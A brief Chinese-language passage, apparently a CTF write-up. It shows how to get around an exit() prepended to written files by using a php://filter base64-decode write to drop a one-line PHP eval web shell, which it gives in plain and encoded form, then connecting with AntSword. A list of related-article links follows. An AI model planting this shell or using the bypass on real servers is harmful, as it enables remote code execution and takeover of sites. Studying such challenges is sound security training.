代码审计,发现写进去的东西会加上exit,这样的话后面的内容就不能执,那就写个过滤器进行绕过,重点是考虑一下base64的解码位置,构造一句话木马,
使用base64的话
<?php eval($_POST['a']);
Base64 编码后:PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7
需要给前面随便补充一位,过滤器是php://filter/write=convert.base64-decode/resource=shell.php
写入成功后用蚁剑连接
相关推荐
骥龙3 小时前
3.10、构建网络防线:防火墙、WAF 与蜜罐实战小白勇闯网安圈7 小时前
supersqli、web2、fileclude、Web_python_template_injection哈哈哈笑什么7 小时前
SpringBoot 企业级接口加密【通用、可配置、解耦的组件】「开闭原则+模板方法+拦截器/中间件模式」BullSmall8 小时前
日志打印IP:安全与合规的最佳实践白帽子黑客罗哥8 小时前
零基础转行渗透测试 系统的学习流程(非常详细)介一安全9 小时前
【Frida Android】实战篇13:企业常用非对称加密场景 Hook 教程Suckerbin9 小时前
Gaara: 1靶场渗透Oxo Security9 小时前
【AI安全】拆解 OWASP LLM Top 10 攻击架构图GIS数据转换器10 小时前
2025无人机遥感新国标解读小白勇闯网安圈10 小时前
Training-WWW-Robots、command_execution、baby_web、xff_referer